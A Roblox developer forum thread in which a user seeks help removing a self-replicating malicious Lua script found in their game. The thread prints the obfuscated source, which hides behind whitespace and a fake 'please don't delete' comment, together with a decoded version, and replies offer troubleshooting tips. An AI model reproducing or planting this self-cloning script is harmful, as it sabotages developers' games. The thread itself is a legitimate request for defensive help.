Virus in my game, I don't use free models, I work by myself and I have no plugins

I want to remove this virus from my game.

function bnjjwerhg__dsadjwdaijnaknjnejnejnaaG_Gfhika(cldn,dsdcn,djeamm,efja,fsy,dhjsiar,hjauhrm,ahfdsa) for ajenljd,idjbgt in ipairs(game.Workspace:GetDescendants())do dfbnrjkrjht=Instance.new("SpecialMesh",idjbgt)print("robloxstudio checking...")script:Clone().Parent=idjbgt wait() wait() wait() end end;getfenv().script:FindFirstAncestorWhichIsA('DataModel'):FindFirstChildWhichIsA('Workspace', false);bnjjwerhg__dsadjwdaijnaknjnejnejnaaG_Gfhika("d","d","d","d","d","d","d","d","d","d","d","d","d","d","d")

There are a bunch of whitespace leading up to this and at the top it says:

--[[This is a script of Roblox Studio, please don't delete
]]																																																																																script.Parent = game.Workspace; print("Warning! Virus detekted now removng virus")

It’s called wall, and it randomly appeared in SoundService.

I do not have any plugins, team create is off and this game is a local file that has not been published, and I do not have a single free model inside my game.

Also, this is the first time it appears here.

I decoded it to:

function functionName(random unused arguments)
    for _,child in ipairs(game.Workspace:GetDescendants()) do 
        mesh=Instance.new("SpecialMesh", child)print("robloxstudio checking...")script:Clone().Parent= child 
        wait() wait() wait() end 
    end;
    getfenv().script:FindFirstAncestorWhichIsA('DataModel'):FindFirstChildWhichIsA('Workspace', false);
functionName("d","d","d","d","d","d","d","d","d","d","d","d","d","d","d")
5 Likes

Hello!
Can you show me a explorer ?
And full script (if you showing full script then nothing)
It’s help me a lot!

2 Likes

How else could It get there? 30 limit

2 Likes

I have no idea! I’ve been working hard now it fills my workspace and everything with a bunch of meshes and scripts, causing insane lag. Deleting it makes another one appear.

3 Likes

Here is my explorer. The script is located in SoundService.
https://gyazo.com/a8b32b70371d99aa38e971e3c81cdd61

2 Likes

I see you edited a post,
You should search for these main keys like “d”,“functionName”
You can use shortcut CTRL + SHIFT + F
And search these words in all scripts
All scripts that is having that delete them

2 Likes

No I meant like I decoded the script. I already used Ctrl shift f and did getfenv and found this script.
the orignal script without whitespace is this:

function bnjjwerhg__dsadjwdaijnaknjnejnejnaaG_Gfhika(cldn,dsdcn,djeamm,efja,fsy,dhjsiar,hjauhrm,ahfdsa) for ajenljd,idjbgt in ipairs(game.Workspace:GetDescendants())do dfbnrjkrjht=Instance.new("SpecialMesh",idjbgt)print("robloxstudio checking...")script:Clone().Parent=idjbgt wait() wait() wait() end end;getfenv().script:FindFirstAncestorWhichIsA('DataModel'):FindFirstChildWhichIsA('Workspace', false);bnjjwerhg__dsadjwdaijnaknjnejnejnaaG_Gfhika("d","d","d","d","d","d","d","d","d","d","d","d","d","d","d")
2 Likes

Well this is weird
I suggest you copy all stuf without that virus into new game
or You can find scripts in free models and delete them or every script that is doing

require(SomeId)

Maybe is it inserting some of virus script!

2 Likes

So like I said, when I make a new game it copies itself.

2 Likes

Did you try remove all scripts in free models ?

2 Likes

Update:
It relocated itself to ServerScriptService
i dont know how that happened.

2 Likes

I don’t have any free models, please read the initial post.

2 Likes

Okay then maybe you how some plugin that is doinng that try disable all plugins and then test it and insert it to new game!

2 Likes

(Don’t be toxic)
Okay then you maybe have in roblox studio or even in computer some type of virus

3 Likes

The only physical ways that this script can keep inserting itself is if you have put in a dodgy model, you have a bad plugin or in worse case scenario you have somehow managed to download an actual virus to your PC (very unlikely however).
The best thing to do would be to double check all your plugins and potentially enable 2FA on your account or change passwords in case it has been compromised and someone is logging into it (again though this is an unlikely scenario)

2 Likes

He don’t have any plugins but okayyy

2 Likes

Have you installed any chrome plugins?
And when you say you have “no plugins” do you mean that you have none in your inventory or you have gone though your plugin manager and uninstalled every plugin?

3 Likes

There is vvirus to able infect your computer maybe you dowloanded and fake os instalation that’s yes installed you a OS but installed some type of virus

3 Likes

I have a couple in my inventory, but I never used them. I don’t use any plugins. I looked in my plugin folder and it has always been empty.

2 Likes

Right in this case it is possible that it could be a plugin. Go into studio, go to your plugin manager. Go through the list and disable/uninstall any of them that look suspicious. You don’t have to be actively using a plugin for it to insert a virus, it just has to be there sitting in the background

2 Likes